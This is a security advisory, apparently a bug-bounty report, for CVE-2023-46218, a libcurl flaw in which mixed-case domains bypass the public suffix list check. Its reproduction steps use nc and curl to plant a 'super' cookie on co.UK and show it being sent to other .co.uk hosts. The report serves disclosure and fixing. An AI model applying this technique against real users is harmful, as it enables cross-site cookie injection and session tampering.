CVE-2023-46218: cookie mixed case PSL bypass

## Summary: libcurl fails to normalize the `hostname` and `cookie_domain` parameters passed to `psl_is_cookie_domain_acceptable` function. As a result a malicious site can set a super cookie if the victim requests the url with hostname with any upper case characters in the domain part of the hostname. libpsl `psl_is_cookie_domain_acceptable` documentation https://rockdaboot.github.io/libpsl/libpsl-Public-Suffix-List-functions.html#psl-is-cookie-domain-acceptable says the following: ``` Use helper function psl_str_to_utf8lower() for normalization of hostname and cookie_domain . ``` This is not done correctly and hence domains with uppercase characters will bypass the PSL check. Note that curl itself will later ignore the cookie domain capitalization and will match even lowercase hostname with the stored supercookie's mixed case domain. It's also worth noting that the request `Host` header will reveal the mixed case used, which will allow the attacker to prepare the correct `Set-Cookie` domain for the attack. ## Steps To Reproduce: 1. `echo -ne "HTTP/1.1 200 OK\r\nSet-Cookie: super=oops; domain=co.UK\r\nContent-Length: 0\r\n" | nc -v -l -q 1 -p 8888` 2. `curl -v -c c.txt --resolve test.co.uk:8888:testserverip http://test.co.UK:8888` 3. `nc -v -l -p 7777` 4. `curl -v -b c.txt --resolve other.co.uk:7777:testserverip http://other.co.uk:7777` Note that the `super` cookie is sent to the `other.com.uk` site. In fact it will be sent to any `.co.uk` hosts now. The generated cookie file: ``` # Netscape HTTP Cookie File # https://curl.se/docs/http-cookies.html # This file was generated by libcurl! Edit at your own risk. .co.UK TRUE / FALSE 0 super oops ``` ## Impact Bypassing supercookie protection.